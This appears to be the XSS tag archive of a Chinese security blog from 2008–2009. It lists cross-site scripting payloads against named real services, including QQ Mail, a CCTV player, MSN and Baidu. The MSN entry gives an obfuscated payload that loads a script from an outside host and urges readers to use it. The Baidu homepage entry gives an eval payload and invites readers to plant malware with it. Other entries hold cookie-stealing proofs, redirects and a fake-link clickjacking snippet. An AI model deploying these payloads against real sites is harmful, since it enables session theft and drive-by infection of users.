存档

文章标签 ‘跨站’

Nohack XSS

2009年7月31日 4 条评论

link.php页面不是Dz论坛自带的,是nohack自己写的,虽然用 htmlspecialchars 函数进行处理了, php.ini配置里gpc也开了,虽然没办法通过闭合进行xss,但是nohack却忘记了javascript伪协议放在资源请求里面会被执行:

http://www.nohack.cn/bbs/link.php?link=javascript:alert(document.cookie)

页面内容:

<iframe id="url_mainframe" frameborder="0" scrolling="yes" name="main" src="javascript:alert(document.cookie)" style="height: 100%; visibility: inherit; width: 100%; z-index: 1;overflow: visible;"></iframe>

这种方式还是很多呀!!

分类: 网络安全 标签: , ,

QQ Mail XSS

2008年11月30日 没有评论

在QQ邮箱附件中,提取文件时的错误没有过滤。测试:

http://m126.mail.qq.com/zh_CN/htmledition/err_filedownload.html?t=800&c=<script>alert(document.cookie)</script>
分类: 网络安全 标签: ,

notclickjacking

2008年9月26日 没有评论

ps:这两天说的很疯狂。记录下来,有时写代码可以欺骗一下别人。。

<form name="my_form_tres" action=""<br />onSubmit=window.open("http://www.example.com")><br /><input type="submit" id="my_submit_button_tres"<br />style="position:absolute;left:0px;visibility:hidden;"/><br /><a href="http://www.breakingpointsystems.com"<br />onMouseUp=document.getElementById(&#039;my_submit_button_tres&#039;).click()>Fake<br />link (onmouseup and click)</a> <br /></form>

更多示例:http://www.planb-security.net/notclickjacking/

分类: 网络安全 标签:

CCTV视频播放器XSS

2008年8月10日 没有评论

先看一下CCTV1在线视频,点击haier 的广告 logo 标志将产生XSS:

<iframe src="http://t.live.cctv.com/cctvwebplay/cctvplayer.html?channel=cctv_p2p_cctv1&width=576&height=320&logo_href=javascript:alert(11111);" id="video"&nbsp;&nbsp;name=&#39;video&#39; frameborder="1" scrolling="no" style="height:352px;width:566px"></iframe>
分类: 网络安全 标签:

msn跨站代码

2008年8月3日 没有评论

来源:Ph4nt0m
如题,最新msn跨站代码,其实早就抓到了,但一直没用,一直在硬盘里扔着,最近心情不好,害人不利己的事偶最喜欢做了-_-!,大家抓紧时间玩吧

有些牛要哭了,yahoo刚补,这个叫啥来的,恩,雪上加霜!

<font color="ffffff"> <div id="jmp" style="display:none">nop</div><div id="ly" style="display:none">function ok(){return true};window.onerror=ok</div><div id="tip" title="<a style="display:none">" style="display:none"></div><div id="tap" title="<" style="display:none"></div><div id="tep" title=">" style="display:none"></div><style>div{background-image:expression(javascript:1?document.write(EC_tip.title+&#039;;top:&#039;+EC_tap.title+&#039;/a&#039;+EC_tep.title+EC_tap.title+&#039;script id=nop&#039;+EC_tep.title+EC_ly.innerHTML+EC_tap.title+&#039;/script&#039;+EC_tep.title+EC_tap.title+&#039;script src=http://xxx.com/test/index.asp?uid=some...@hotmail.com&#039;+EC_tep.title+EC_tap.title+&#039;/script&#039;+EC_tep.title):1=1);}</style></font>
分类: 网络安全 标签:

百度搜索引擎竞价排名系统跨站

2008年7月22日 没有评论

看到一篇《The Week of Baidu Bugs – Day 06: 百度竞价排名多处XSS漏洞》的文章,其中只提到几个部位,我打开百度看了一下,没有过滤特殊字符,造成跨站:

<br />http://www2.baidu.com/index.php?entered_login=%27%3E%3Ciframe%20src=http://www.woyigui.cn/index.php%20/%3E%3C%27&entered_password=ddd&entered_imagecode=rat8

直接跳转:

http://www2.baidu.com/index.php?entered_login=&#039;><SCRIPT%20language=javascript>top.location="http://www.woyigui.cn"</SCRIPT><&#039;&entered_password=ddd&entered_imagecode=rat8

效果图:

分类: 网络安全 标签: ,

Ratproxy — Google 的 XSS 检测工具

2008年7月10日 没有评论

作者: Fenng
网址: http://www.dbanotes.net/security/ratproxy_google_xss.html

跨站脚本攻击(XSS, Cross Site Scripting) 可能是目前所有网站都比较头疼的问题,Google 也不例外。这次 Google 又做了一次雷锋,把内部用来审计 XSS 的工具开源了:ratproxy。   阅读全文…

世界之窗等浏览器本地xss跨域漏洞POC

2008年6月27日 没有评论

ps:我用世界之窗N个月。。。

漏洞说明:http://www.80sec.com/360-sec-browser-localzone-xss.html

文档来源:http://www.80sec.com/release/The-world-browser-locale-zone-xss-POC.txt

漏洞分析:世界之窗浏览器在起始页面是以res://E:\PROGRA~1\THEWOR~1.0\languages\chs.dll/TWHOME.HTM的形式来处理的,而由于缺乏对res协议安全的必要控制,导致页面的权限很高,而该页面中存在的一个xss问题将导致本地跨域漏洞,简单分析如下: 阅读全文…

分类: 网络安全 标签: ,

百度首页惊爆挂马漏洞

2008年6月23日 没有评论

By:茄子宝
ps:直接浏览器访问即可,至于挂马吗?自己发挥吧。

http://www.baidu.com/index.php?bar="/**/style=xss:expression((window.r!=1)?eval(&#039;window.r=1;eval(unescape(location.hash.substr(1)))&#039;):1);#alert%28%27woyigui%27%29
分类: 网络安全 标签:

winrar也玩跨站

2008年6月16日 没有评论

winrar创建自解压文件,高级,自解压选项,文本和图标可写代码:

1
2
3
<script>
alert("cnshark.net")
</script>

阅读全文…

分类: 网络安全 标签: ,